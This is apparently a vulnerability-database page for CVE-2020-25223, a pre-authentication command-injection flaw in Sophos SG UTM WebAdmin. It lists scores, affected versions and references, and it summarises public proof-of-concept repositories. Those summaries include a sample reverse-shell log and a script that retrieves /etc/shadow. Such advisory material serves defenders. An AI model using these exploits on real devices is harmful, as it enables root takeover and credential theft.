Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
10
CVSSv2

CVE-2020-25223

Published: 25/09/2020 Updated: 17/10/2023
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 891
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Subscribe to Unified Threat Management

Vulnerability Summary

A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

sophos unified threat management

sophos unified threat management 9.511

sophos unified threat management 9.607

sophos unified threat management 9.705

Exploits

Exploit DB: Sophos UTM WebAdmin SID Command Injection
This Metasploit module exploits an SID-based command injection in Sophos UTM's WebAdmin interface to execute shell commands as the root user ...

Github Repositories

https://github.com/twentybel0w/CVE-2020-25233

CVE-2020-25223 A PoC script for testing CVE-2020-25223 against an affected Sophos UTM Given an IP address, the script attempts to download a copy of the devices /etc/shadow file Original research: wwwatrediscom/blog/2021/8/18/sophos-utm-cve-2020-25223

https://github.com/darrenmartyn/sophucked

CVE-2020-25223

sophucked CVE-2020-25223 RCE PoC, gets reverse shell Pre-auth Implemented this quickly as it was needed to unify some threat magnets Example Use: # python sophuckedpy xxxx:4443 xxxx 80 (+) starting handler on port 80 (+) Sending callback to xxxx:80 (+) connection from xxxx (+) pop thy shell! bash: no job control in this shell utm:/var/confd # unset HISTF

https://github.com/twentybel0w/CVE-2020-25223

CVE-2020-25223 A PoC script for testing CVE-2020-25223 against an affected Sophos UTM Given an IP address, the script attempts to download a copy of the devices /etc/shadow file Original research: wwwatrediscom/blog/2021/8/18/sophos-utm-cve-2020-25223

References

CWE-78https://community.sophos.com/b/security-bloghttps://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223http://packetstormsecurity.com/files/164697/Sophos-UTM-WebAdmin-SID-Command-Injection.htmlhttps://cwe.mitre.org/data/definitions/78.htmlhttps://www.secpod.com/blog/remote-code-execution-in-sophos-utm/https://nvd.nist.govhttps://packetstormsecurity.com/files/164697/Sophos-UTM-WebAdmin-SID-Command-Injection.htmlhttps://github.com/darrenmartyn/sophucked
CVSSv2
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2024-4040privilege escalationCVE-2024-4112CVE-2024-32872man-in-the-middleCVE-2024-32788bypassCVE-2024-3400CVE-2024-28976
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook